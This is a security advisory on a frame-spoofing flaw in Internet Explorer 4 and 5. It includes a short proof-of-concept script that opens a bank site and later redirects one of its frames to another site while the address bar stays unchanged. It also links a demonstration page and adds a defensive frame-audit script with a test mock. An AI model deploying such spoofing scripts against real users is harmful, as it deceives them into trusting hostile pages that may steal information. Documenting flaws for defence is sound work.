COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE4, 5

PROBLEM

    Georgi Guninski found the following.  Internet Explorer 5.0 under
    Windows 95 (other versions are presumably affected as well) with
    its default security settings allows frame spoofing.  The problem
    is that a script can set the location of a frame belonging to
    another site to an arbitrary URL without the address bar being
    updated.  This vulnerability allows misleading the user into
    believing he is browsing a trusted site, while in fact he may be
    browsing a hostile site which might be stealing information.  The
    code is:

        <SCRIPT>
        b=window.open("http://www.citybank.com");
        function g()
        {
        b.frames[2].location="http://www.yahoo.com";
        }
        setTimeout("g()",6000);
        </SCRIPT>

    Demonstration is available at

        http://www.nat.bg/~joro/msfrspoof.html

    Internet Explorer 4.72.3110.8 (128 Bit, SP1) on NT4 also appears to
    be vulnerable.
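    The following is an added example, not code from the advisory or from
    Georgi Guninski: a frame-integrity check that the framed, trusted site
    could run in its own frameset page as defence in depth against the
    navigation shown above.  The function names, the `expectedHost`
    parameter and the mock window are assumptions of this example.

```javascript
// Added example (not part of the advisory): a frame-integrity audit the
// framed, trusted site could run in its frameset page. Reading the hostname
// of a frame navigated to another origin throws under the same-origin
// policy, so a throw (or an unexpected host) marks that frame as spoofed.

function auditFrames(win, expectedHost) {
  const findings = [];
  for (let i = 0; i < win.frames.length; i++) {
    let host;
    try {
      host = win.frames[i].location.hostname;
    } catch (e) {
      // Cross-origin read blocked: the frame now shows foreign content.
      findings.push({ index: i, status: "cross-origin", host: null });
      continue;
    }
    if (host !== expectedHost) {
      findings.push({ index: i, status: "unexpected-host", host });
    }
  }
  return findings;
}

// Reaction: send every spoofed frame back to a known page of our own (assigning
// a frame's location is allowed even when reading it is not). Returns indices.
function resetSpoofedFrames(win, expectedHost, safeUrl) {
  const bad = auditFrames(win, expectedHost);
  for (const f of bad) {
    win.frames[f.index].location = safeUrl;
  }
  return bad.map(f => f.index);
}

// Constructed mock standing in for a browser window so this runs under Node:
// frames not on ownHost behave cross-origin (hostname read throws, set works).
class MockFrame {
  constructor(host, ownHost) { this._host = host; this._own = ownHost; }
  get location() {
    const f = this;
    return { get hostname() {
      if (f._host !== f._own) throw new Error("SecurityError");
      return f._host;
    } };
  }
  set location(url) { this._host = new URL(url).hostname; }
}
function mockWindow(frameHosts, ownHost) {
  return { frames: frameHosts.map(h => new MockFrame(h, ownHost)) };
}
```

    In a real page the audit would be run on a timer or on frame load
    events; the mock only reproduces the situation of the demonstration
    above, where the third frame of the trusted window has been navigated
    elsewhere.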

SOLUTION

    Set the "Navigate sub-frames across different domains" option to
    Disable.